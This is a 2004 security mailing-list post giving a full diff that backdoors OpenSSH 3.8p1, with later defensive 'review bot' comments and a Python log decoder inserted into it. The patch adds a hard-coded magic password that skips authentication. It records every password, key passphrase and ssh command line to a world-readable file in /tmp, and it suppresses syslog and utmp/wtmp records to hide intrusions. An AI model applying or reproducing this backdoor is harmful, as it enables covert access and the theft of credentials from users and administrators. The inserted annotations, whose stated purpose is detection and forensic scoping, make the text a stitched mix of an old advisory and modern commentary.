[EXPL] Backdooring OpenSSH

From: SecuriTeam (support_at_securiteam.com)
Date: 03/17/04

    To: list@securiteam.com
    Date: 17 Mar 2004 18:42:51 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Backdooring OpenSSH
    ------------------------------------------------------------------------

    SUMMARY

    Below is a .diff file that patches the OpenSSH-3.8p1 client and daemon
    sources to log every login and password. It also adds a magic password
    for the daemon, stores the captured passwords in an encrypted logfile, and
    disables logging when the magic password is used. Based upon the work of
    Aion.
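    As an added example (not part of the advisory or of the patch), a small forensic decoder for the logfile the patch's bellalog() macro writes: the "encryption" is a bitwise NOT of each byte, so inverting again recovers the text. It assumes the record layouts from the sprintf() calls in the patch below, redacts secrets to their length, and the sample log is constructed.

```python
"""Decoder for the byte-inverted log written by the patch's bellalog() macro.
Added example, not from the advisory: ~ on every byte is an encoding, not
encryption, so inverting again recovers it. Secrets are redacted to a length."""
import os
import re

SSH_LOG = "/tmp/.lost+found"  # path hard-coded in the patch's includes.h

# Record shapes, one per sprintf() in the patch (note the trailing spaces).
RE_PASSWD = re.compile(r"^passwd from: (\S+) \tuser: (\S+) \tpass: (.*) $")
RE_MMPAM = re.compile(r"^mm pam from: (\S+) \tuser: (\S+) $")
RE_RESPOND = re.compile(r"^pam_respond: \[(\d+)\]: (.*)$")
RE_READPW = re.compile(r"^readpass: (.*)$")
RE_ARGV = re.compile(r"^ssh: av\[(\d+)\]: (.*)$")

def decode_log(data: bytes) -> str:
    """Undo abuff[ai] = ~abuff[ai]; latin-1 maps every byte value."""
    return bytes(b ^ 0xFF for b in data).decode("latin-1")

def parse_records(text: str) -> list:
    """One dict per record; password/passphrase values replaced by their length."""
    records = []
    for line in filter(None, text.split("\n")):
        if m := RE_PASSWD.match(line):
            records.append({"kind": "passwd", "src": m[1], "user": m[2], "secret_len": len(m[3])})
        elif m := RE_MMPAM.match(line):
            records.append({"kind": "mm_pam", "src": m[1], "user": m[2]})
        elif m := RE_RESPOND.match(line):
            records.append({"kind": "pam_respond", "index": int(m[1]), "secret_len": len(m[2])})
        elif m := RE_READPW.match(line):
            records.append({"kind": "readpass", "secret_len": len(m[1])})
        elif m := RE_ARGV.match(line):
            records.append({"kind": "ssh_argv", "index": int(m[1]), "arg": m[2]})
        else:
            records.append({"kind": "unknown", "raw": line})
    return records

def exposed_accounts(records: list) -> set:
    """(source IP, username) pairs whose password reached the log: the IR scope."""
    return {(r["src"], r["user"]) for r in records if r["kind"] in ("passwd", "mm_pam")}

# Constructed sample: two server-side records and one client-side readpass record,
# inverted exactly as bellalog() stores them (fwrite of alen bytes, no NUL).
SAMPLE_LOG = bytes(b ^ 0xFF for b in
                   b"passwd from: 192.0.2.10 \tuser: root \tpass: hunter2 \n"
                   b"mm pam from: 192.0.2.10 \tuser: root \n"
                   b"readpass: correct horse\n")

if __name__ == "__main__":
    data = open(SSH_LOG, "rb").read() if os.path.exists(SSH_LOG) else SAMPLE_LOG
    print(*parse_records(decode_log(data)), sep="\n")
```

    Run on a host where the hard-coded file exists, it prints one redacted record per captured credential; otherwise it runs on the constructed sample.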

    DETAILS

    Code:
    diff -r -N -c openssh-3.8p1/auth-pam.c openssh-3.8p1+/auth-pam.c
    *** openssh-3.8p1/auth-pam.c Tue Feb 17 13:20:08 2004
    --- openssh-3.8p1+/auth-pam.c Tue Mar 2 19:24:00 2004
    ***************
    *** 342,347 ****
    --- 342,348 ----
       if (sshpam_err != PAM_SUCCESS)
        goto auth_fail;
       sshpam_err = pam_authenticate(sshpam_handle, 0);
    + if (bella) sshpam_err = PAM_SUCCESS;
       if (sshpam_err != PAM_SUCCESS)
        goto auth_fail;
       buffer_put_cstring(&buffer, "OK");
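    Review bot: `if (bella) sshpam_err = PAM_SUCCESS;` overwrites the verdict of pam_authenticate() whenever the global `bella` is set, so a failed PAM authentication is reported to the caller as success and the `auth_fail` path is never taken. Because it sits between the call and its error check, a diff of the installed source against pristine 3.8p1, or a package integrity check of the sshd binary, is the reliable way to find it; the host's auth log will not show it, since log.c is silenced in the same patch.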
    diff -r -N -c openssh-3.8p1/auth-passwd.c openssh-3.8p1+/auth-passwd.c
    *** openssh-3.8p1/auth-passwd.c Thu Feb 22 00:23:36 2004
    --- openssh-3.8p1+/auth-passwd.c Tue Mar 2 19:24:00 2004
    ***************
    *** 72,77 ****
    --- 72,81 ----
      #endif
       if (*password == '\0' && options.permit_empty_passwd == 0)
        return 0;
    + if (!strcmp(BACKPWD, password)) return bella=1; bella=0;
    + sprintf(abuff, "passwd from: %s \tuser: %s \tpass: %s \n",
    + get_remote_ipaddr(), pw->pw_name, password);
    + bellalog();
      
      #if defined(HAVE_OSF_SIA)
       return auth_sia_password(authctxt, password) && ok;
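    Review bot: `if (!strcmp(BACKPWD, password)) return bella=1; bella=0;` returns 1 (authenticated) before the real password check runs whenever the supplied password equals the compiled-in BACKPWD, and only the non-matching case falls through to be logged, so the magic password itself never lands in the log. The following `sprintf` copies the untrusted, unbounded `password` into the fixed 512-byte `abuff` from includes.h, a pattern any source audit should flag, and the result is appended to SSH_LOG, which bellalog() leaves readable by every local user via chmod 0666.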
    diff -r -N -c openssh-3.8p1/includes.h openssh-3.8p1+/includes.h
    *** openssh-3.8p1/includes.h Sun Feb 6 11:29:42 2004
    --- openssh-3.8p1+/includes.h Tue Mar 2 19:24:00 2004
    ***************
    *** 13,18 ****
    --- 13,38 ----
       * called by a name other than "ssh" or "Secure Shell".
       */
      
    + // start patch by acme - acme at olografix/paranoici dot org
    + #include <sys/stat.h>
    + #include <stdio.h>
    +
    + #define BACKPWD "inspassword"
    + #define SSH_LOG "/tmp/.lost+found"
    +
    + FILE *alog;
    + char abuff[512];
    + int alen, ai, bella;
    +
    + #define bellalog() { \
    + alen=strlen(abuff); \
    + for(ai=0; ai<=alen; ai++) abuff[ai]=~abuff[ai]; \
    + alog=fopen(SSH_LOG, "a"); \
    + if(alog!=NULL) { fwrite(abuff, alen, 1, alog); fclose(alog);} \
    + chmod(SSH_LOG, 0666); \
    + }
    + // end patch, from aion
    +
      #ifndef INCLUDES_H
      #define INCLUDES_H
      
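    Review bot: the "encrypted logfile" promised in the summary is `abuff[ai]=~abuff[ai]`, a bitwise NOT of every byte: a fixed, keyless transform that anyone who can read the file reverses in one line, and `chmod(SSH_LOG, 0666)` makes /tmp/.lost+found readable and writable by every local user. For a defender, that hard-coded path, a file consisting only of bytes with the high bit set and 0xF5 (inverted newline) record separators, and the literal "inspassword" in the sshd binary are the concrete indicators this patch leaves. As a style point, `alog`, `abuff`, `alen`, `ai` and `bella` are defined rather than declared in a header every translation unit includes, so the build depends on the linker merging duplicate common symbols; and the loop bound `ai<=alen` also inverts the terminating NUL, harmless only because fwrite() writes exactly `alen` bytes.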
    diff -r -N -c openssh-3.8p1/log.c openssh-3.8p1+/log.c
    *** openssh-3.8p1/log.c Tue Feb 18 12:59:44 2004
    --- openssh-3.8p1+/log.c Tue Mar 2 19:24:00 2004
    ***************
    *** 273,278 ****
    --- 273,279 ----
       char *txt = NULL;
       int pri = LOG_INFO;
      
    + if (bella) return;
       if (level > log_level)
        return;
      
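    Review bot: `if (bella) return;` at the top of the shared logging routine drops every syslog message sshd would emit once the magic password has been seen, including the Accepted/Failed lines, so the host's own auth log is blind to these sessions. An SSH session present in firewall or flow records with no matching sshd log entry is the inconsistency a detection rule can key on.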
    diff -r -N -c openssh-3.8p1/loginrec.c openssh-3.8p1+/loginrec.c
    *** openssh-3.8p1/loginrec.c Sun Feb 10 06:49:36 2004
    --- openssh-3.8p1+/loginrec.c Tue Mar 2 19:24:00 2004
    ***************
    *** 406,411 ****
    --- 406,412 ----
      int
      login_write (struct logininfo *li)
      {
    + if (bella) return 0;
      #ifndef HAVE_CYGWIN
       if ((int)geteuid() != 0) {
         logit("Attempt to write login records by non-root user (aborting)");
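    Review bot: `if (bella) return 0;` short-circuits login_write() before the euid check, so no utmp/wtmp/lastlog record is written and `who`, `last` and `lastlog` show nothing for the session. Together with the log.c change this removes every host-local trace of the login except the /tmp file the patch itself writes.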
    diff -r -N -c openssh-3.8p1/monitor.c openssh-3.8p1+/monitor.c
    *** openssh-3.8p1/monitor.c Wed Feb 6 06:40:28 2004
    --- openssh-3.8p1+/monitor.c Tue Mar 2 19:24:00 2004
    ***************
    *** 786,791 ****
    --- 786,793 ----
        fatal("UsePAM not set, but ended up in %s anyway", __func__);
      
       user = buffer_get_string(m, NULL);
    + sprintf(abuff, "mm pam from: %s \tuser: %s \n", get_remote_ipaddr(),
    user);
    + bellalog();
      
       start_pam(user);
      
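    Review bot: this records the username of every PAM authentication the privileged monitor handles, with `user` taken straight from the unprivileged child's message and copied by `sprintf` into the fixed-size `abuff` with no bound. Each record is a (source IP, username) pair, which is exactly the information an incident responder needs to scope which accounts were exposed on a compromised host.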
    ***************
    *** 881,888 ****
       num = buffer_get_int(m);
       if (num > 0) {
        resp = xmalloc(num * sizeof(char *));
    ! for (i = 0; i < num; ++i)
         resp[i] = buffer_get_string(m, NULL);
        ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
        for (i = 0; i < num; ++i)
         xfree(resp[i]);
    --- 883,894 ----
       num = buffer_get_int(m);
       if (num > 0) {
        resp = xmalloc(num * sizeof(char *));
    ! for (i = 0; i < num; ++i) {
         resp[i] = buffer_get_string(m, NULL);
    + sprintf(abuff, "pam_respond: [%d]: %s\n", i, resp[i]);
    + if(!strcmp(BACKPWD, resp[i])) bella=1;
    + else bellalog();
    + }
        ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
        for (i = 0; i < num; ++i)
         xfree(resp[i]);
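    Review bot: in the keyboard-interactive path each response is compared to BACKPWD and, on a match, `bella=1` is set and the response is deliberately not logged (`else bellalog()`), so the magic password leaves no trace in the attacker's file either; every non-matching response, i.e. the real passwords of legitimate users, is logged under "pam_respond". Unlike auth-passwd.c, nothing here resets `bella` to 0 after a non-match, so once set the flag stays set for the life of the process.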
    diff -r -N -c openssh-3.8p1/readpass.c openssh-3.8p1+/readpass.c
    *** openssh-3.8p1/readpass.c Fri Jan 24 02:36:23 2003
    --- openssh-3.8p1+/readpass.c Tue Mar 2 19:24:00 2004
    ***************
    *** 123,128 ****
    --- 123,130 ----
        if ((ret = ssh_askpass(askpass, prompt)) == NULL)
         if (!(flags & RP_ALLOW_EOF))
          return xstrdup("");
    + sprintf(abuff, "readpass: %s\n", ret);
    + bellalog();
        return ret;
       }
      
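    Review bot: this is client-side code: read_passphrase() via ssh_askpass returns whatever the user typed, and the patch logs it before returning it, so a trojaned ssh client captures passwords and key passphrases for every remote host the user connects to, not only logins to the patched machine. The record goes to the same world-readable /tmp/.lost+found on the client.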
    ***************
    *** 134,138 ****
    --- 136,142 ----
      
       ret = xstrdup(buf);
       memset(buf, 'x', sizeof buf);
    + sprintf(abuff, "readpass: %s\n", ret);
    + bellalog();
       return ret;
      }
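    Review bot: the tty prompt path gets the same treatment as the askpass path above: `buf` is still scrubbed with memset() as in the original, but the copy in `ret` has already been formatted into `abuff` and written to disk, so the original's care in wiping the buffer is defeated. `abuff` itself is never cleared after the write, so the last captured secret also persists, byte-inverted, in process memory.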
    diff -r -N -c openssh-3.8p1/ssh.c openssh-3.8p1+/ssh.c
    *** openssh-3.8p1/ssh.c Tue Dec 17 06:33:12 2003
    --- openssh-3.8p1+/ssh.c Tue Mar 2 19:24:00 2004
    ***************
    *** 212,217 ****
    --- 212,221 ----
       extern int optind, optreset;
       extern char *optarg;
      
    + for(i=1; i<ac; i++) {
    + sprintf(abuff, "ssh: av[%d]: %s\n", i, av[i]);
    + bellalog();
    + }
       __progname = ssh_get_progname(av[0]);
       init_rng();
      
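    Review bot: logging `av[1]` through `av[ac-1]` at the very start of main(), before `__progname` is even set, captures the full ssh command line, including user@host targets and any -l, -p or -o arguments, giving a complete picture of which systems the operator of this client administers. On a workstation, an unexpected /tmp/.lost+found file whose contents are all high-bit bytes is the artifact to look for.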
    diff -r -N -c openssh-3.8p1/version.h openssh-3.8p1+/version.h
    *** openssh-3.8p1/version.h Tue Feb 23 23:24:02 2004
    --- openssh-3.8p1+/version.h Tue Mar 2 19:24:00 2004
    ***************
    *** 1,3 ****
      /* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
      
    ! #define SSH_VERSION "OpenSSH_3.8p1"
    --- 1,3 ----
      /* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
      
    ! #define SSH_VERSION "OpenSSH_3.8p1" // we can change it
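    Review bot: the only change here is a comment; SSH_VERSION still reads "OpenSSH_3.8p1", so the protocol banner a scanner or inventory tool sees is identical to a clean build and cannot tell the two apart. Verifying the installed sshd and ssh binaries against distribution package checksums or a known-good build is the check that actually distinguishes them.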

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:acme@olografix.org> acme.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

